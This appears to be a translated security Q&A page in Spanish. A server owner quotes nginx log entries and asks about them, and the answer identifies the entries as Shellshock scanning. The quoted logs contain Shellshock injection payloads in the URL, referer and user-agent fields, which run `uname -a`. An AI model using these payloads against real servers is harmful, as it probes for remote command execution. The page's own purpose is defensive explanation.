actividad de registro del servidor web extraño

Question

actividad de registro del servidor web extraño

#1 de ThoriumBR (7 votos)

1

He notado alguna actividad sospechosa en los registros de mi servidor web:

188.165.66.110 - - [20/Feb/2015:03:58:28 +0000] "GET /?x=()?x=()?x=()?x=() {:; }; echo Content-type:text/plain;echo;echo;echo M'expr 1330 + 7'H;/bin/uname -a;echo @ HTTP/1.0" 301 178 "() {:; }; echo Content-type:text/plain;echo;echo;echo M'expr 1330 + 7'H;/bin/uname -a;echo @" "() {:; }; echo Content-type:text/plain;echo;echo;echo M'expr 1330 + 7'H;/bin/uname -a;echo @"

188.165.66.110 - - [20/Feb/2015:03:58:23 +0000] "GET /?x=()?x=() {:; }; echo Content-type:text/plain;echo;echo;echo M'expr 1330 + 7'H;/bin/uname -a;echo @ HTTP/1.0" 301 178 "() {:; }; echo Content-type:text/plain;echo;echo;echo M'expr 1330 + 7'H;/bin/uname -a;echo @" "() {:; }; echo Content-type:text/plain;echo;echo;echo M'expr 1330 + 7'H;/bin/uname -a;echo @"

188.165.66.110 - - [20/Feb/2015:03:58:23 +0000] "GET /?x=()?x=()?x=() {:; }; echo Content-type:text/plain;echo;echo;echo M'expr 1330 + 7'H;/bin/uname -a;echo @ HTTP/1.0" 301 178 "() {:; }; echo Content-type:text/plain;echo;echo;echo M'expr 1330 + 7'H;/bin/uname -a;echo @" "() {:; }; echo Content-type:text/plain;echo;echo;echo M'expr 1330 + 7'H;/bin/uname -a;echo @"

188.165.66.110 - - [20/Feb/2015:03:58:17 +0000] "GET /?x=() {:; }; echo Content-type:text/plain;echo;echo;echo M'expr 1330 + 7'H;/bin/uname -a;echo @ HTTP/1.0" 301 178 "() {:; }; echo Content-type:text/plain;echo;echo;echo M'expr 1330 + 7'H;/bin/uname -a;echo @" "() {:; }; echo Content-type:text/plain;echo;echo;echo M'expr 1330 + 7'H;/bin/uname -a;echo @"

176.190.169.100 - - [19/Feb/2015:20:06:36 +0000] "\x9B9\x8C\x13s\xF2\xE2^T\x1BL\x07\xE8\x22\x1CY4\x91'\x0F\x0ELh\xDCXEeZ\x87\x8E/\x5C\x903\xEF\x1F\x07\xD9[J" 400 166 "-" "-"</code><br><br> <code>109.239.221.237 - - [19/Feb/2015:20:07:16 +0000] "6\x92@\x88u\xD3+/\xD2\xD2\xFE\x98\xF4C\xB3\x89\x04;\xA7\xF1U\xF8\xA5\x02\xD8\xA4\xCCK\x9F\xC6e\x11" 400 166 "-" "-"

¿Alguna idea de lo que estaba tratando de lograr aquí?

logging nginx

pregunta Paul 20.02.2015 - 19:39

fuente

1 respuesta

Lea otras preguntas en las etiquetas logging nginx

¿SSLv3 usa SHA256 como algoritmo de hash? ¿Cómo detener los ataques DDoS con una simple función en el servidor web?

score 7 · Accepted Answer

Este es un ataque conocido, Shellshock . En los servidores con un shell bash vulnerable, el atacante puede explotar una condición que ejecuta comandos de shell enviando una URL especialmente diseñada.

Básicamente, el atacante está escaneando su servidor para ver si es vulnerable a él. Si se encontró que su servidor era vulnerable, probablemente también vería que se envían algunos wget / curl en las URL.